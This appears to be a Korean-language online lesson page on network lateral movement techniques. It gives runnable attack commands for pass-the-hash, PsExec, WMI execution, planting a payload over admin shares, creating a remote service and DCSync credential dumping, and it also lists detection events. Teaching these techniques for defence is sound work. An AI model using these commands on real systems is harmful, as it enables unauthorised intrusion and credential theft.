측면 이동 기법
WMI, PsExec, WinRM 및 SMB 공유를 사용해 경보를 발생시키지 않고 네트워크 내부를 이동합니다.
측면 이동 기법은(는) CoddyKit의 무료 Cyber Security Academy 강의입니다. 이것은 4개 중 3번째 강의입니다. 아래에서 전체 강의를 무료로 읽을 수 있으며, 내장 코드 에디터와 24/7 AI 튜터와 함께 브라우저에서 직접 실습할 수 있습니다. 이 강의는 Cyber Security Academy 학습 경로의 일부이며, 진행 상황이 웹과 CoddyKit 앱에 동기화됩니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.
측면 이동이란 무엇인가요
측면 이동은 최초 침해 이후 공격자가 네트워크를 점진적으로 이동하는 데 사용하는 기법의 집합입니다. 첫 거점에서 도메인 컨트롤러, 데이터베이스, 백업 시스템과 같은 더 중요한 대상으로 이동하는 방식입니다.
해시 전달(PtH)
Windows NTLM 인증에서는 평문 암호 대신 암호 해시를 직접 사용할 수 있습니다. NTLM 해시를 덤프한 공격자는 해시를 해독하지 않고도 다른 시스템에 인증할 수 있습니다.
# Impacket psexec with PtH:
impacket-psexec -hashes :NTLM_HASH_HERE administrator@10.0.0.5
# CrackMapExec:
crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASH티켓 전달(PtT)
Kerberos 티켓(TGT 또는 TGS)은 메모리에서 추출하여 티켓 소유자로 인증하는 데 사용할 수 있습니다. 골든 티켓 공격은 KRBTGT 해시를 사용하여 TGT를 위조하므로 도메인에 무제한으로 Kerberos 액세스할 수 있습니다.
원격 코드 실행: PSExec
psexec(Sysinternals 및 Impacket)는 SMB/관리자 공유를 통해 원격 Windows 호스트에서 명령을 실행합니다. 관리자 자격 증명이 필요하며 대상에 서비스 바이너리를 생성합니다.
impacket-psexec administrator:Password@10.0.0.5
# Or via Metasploit:
use exploit/windows/smb/psexecWMI를 이용한 측면 이동
Windows Management Instrumentation을 사용하면 여러 도구에서 탐지할 수 있는 파일을 생성하지 않고 원격 코드 실행을 수행할 수 있습니다:
# Using wmiexec (Impacket):
impacket-wmiexec administrator:Password@10.0.0.5
# Or via PowerShell:
$wmi = [wmiclass]"\\10.0.0.5\root\cimv2:Win32_Process"
$wmi.Create("cmd.exe /c payload.exe")SMB 및 관리자 공유
Windows 관리자 공유(C$, ADMIN$, IPC$)를 사용하면 관리자 자격 증명으로 측면 이동을 수행할 수 있습니다:
# Mount admin share:
net use \\10.0.0.5\C$ /user:DOMAIN\administrator Password
# Copy and execute:
copy evil.exe \\10.0.0.5\C$\Windows\Temp\
impacket-smbexec administrator:Password@10.0.0.5원격 서비스: sc 및 at
원격 시스템에서 서비스 또는 예약 작업 생성:
# Create remote service:
sc \\10.0.0.5 create EvilSvc binPath= "C:\Temp\payload.exe"
sc \\10.0.0.5 start EvilSvc
# Scheduled task:
impacket-atexec administrator:Password@10.0.0.5 "whoami > C:\Temp\out.txt"RDP 및 대화형 세션
RDP(원격 데스크톱 프로토콜, 포트 3389)는 완전한 대화형 액세스를 제공합니다. 공격자는 탈취한 자격 증명으로 RDP를 사용합니다. 방어 방법: RDP를 점프 서버로 제한하고, NLA를 요구하며, 모든 세션을 기록합니다.
# RDP with stolen creds:
xfreerdp /u:administrator /p:Password /v:10.0.0.5
# Bypass NLA with NTLM hash:
xfreerdp /u:administrator /pth:NTLM_HASH /v:10.0.0.5측면 이동 수단으로서의 SSH
Linux 환경에서는 탈취한 키나 자격 증명을 사용하는 SSH로 측면 이동을 수행합니다. 에이전트 전달 악용을 통해 침해된 호스트를 거쳐 이동할 수 있습니다. SSH 터널은 포트를 전달하여 원래는 접근할 수 없는 시스템에 도달하게 합니다.
# SSH pivoting:
ssh -L 5432:internal-db:5432 user@pivot_host
# SSH dynamic SOCKS proxy:
ssh -D 1080 user@pivot_hostActive Directory 복제(DCSync)
DCSync는 AD 복제를 악용하여 DC에서 직접 암호 해시를 가져오며, DC에서 코드를 실행할 필요가 없습니다. DS-Replication-Get-Changes-All 권한이 필요합니다:
# Impacket secretsdump:
impacket-secretsdump domain/user:password@dc_ip
# Mimikatz:
lsadump::dcsync /domain:corp.local /user:krbtgt측면 이동 탐지
탐지 지표:
- 비정상적인 Type 3(네트워크) 로그온이 포함된 이벤트 4624
- 원격 호스트에서의 서비스 생성(Event 7045)
- 워크스테이션 간 SMB 연결
- 원격 호스트에서의 WMI 프로세스 생성
- 비정상적인 계정 동작(사용자가 여러 컴퓨터에서 로그인)
빠른 확인: 측면 이동
어떤 기법을 사용하면 공격자가 해시를 해독하지 않고 캡처한 NTLM 해시로 Windows 시스템에 인증할 수 있나요?
학습 내용 요약
측면 이동은 침해된 자격 증명과 프로토콜을 사용하여 네트워크 전체로 확산됩니다. 주요 기법으로는 해시 전달(NTLM 해시 재사용), 티켓 전달(Kerberos), 원격 실행을 위한 PSExec/WMI/SMB, 도메인 자격 증명 수집을 위한 DCSync가 있습니다. 탐지 방법으로는 비정상적인 네트워크 로그온(이벤트 4624), 원격 서비스 생성(이벤트 7045), 워크스테이션 간 SMB 트래픽이 있습니다.
자주 묻는 질문
“측면 이동 기법” 강의는 무료인가요?
네 — “측면 이동 기법” 전체 내용을 이 웹사이트에서 무료로 읽을 수 있습니다. 인터랙티브하게 실습하려면(내장 코드 에디터와 24/7 AI 튜터), CoddyKit PRO로 업그레이드하면 Cyber Security Academy 강의 전체를 잠금 해제할 수 있습니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.
“측면 이동 기법”에서 뭘 배우나요?
WMI, PsExec, WinRM 및 SMB 공유를 사용해 경보를 발생시키지 않고 네트워크 내부를 이동합니다. 브라우저에서 직접 실행하는 실습 코드로 Cyber Security Academy을(를) 배우며, 24/7 AI 튜터가 강의를 진행하면서 질문에 답변해줍니다.
Cyber Security Academy을(를) 시작하는 데 경험이 필요한가요?
사전 경험은 필요하지 않습니다. CoddyKit의 Cyber Security Academy은(는) 초급자부터 고급 학습자까지를 위해 구성되어 있으므로, 여기서 시작하거나 처음부터 시작할 수 있으며 자신의 속도대로 진행할 수 있습니다. 이것은 4개 중 3번째 강의입니다.
“측면 이동 기법” 강의는 얼마나 걸리나요?
대부분의 CoddyKit 강의는 약 5~10분이 소요됩니다. 각 강의는 간결하고 인터랙티브하여 꾸준한 진행이 가능하며, 웹과 앱에서 중단한 부분부터 바로 시작할 수 있습니다.
이 Cyber Security Academy 강의에서 코드를 작성하고 실행할 수 있나요?
네. 모든 Cyber Security Academy 강의에는 내장 코드 에디터가 포함되어 있으므로, 브라우저에서 바로 실제 코드를 작성하고 실행한 후 즉시 AI 피드백을 받을 수 있습니다 — 로컬 설정이 필요 없습니다.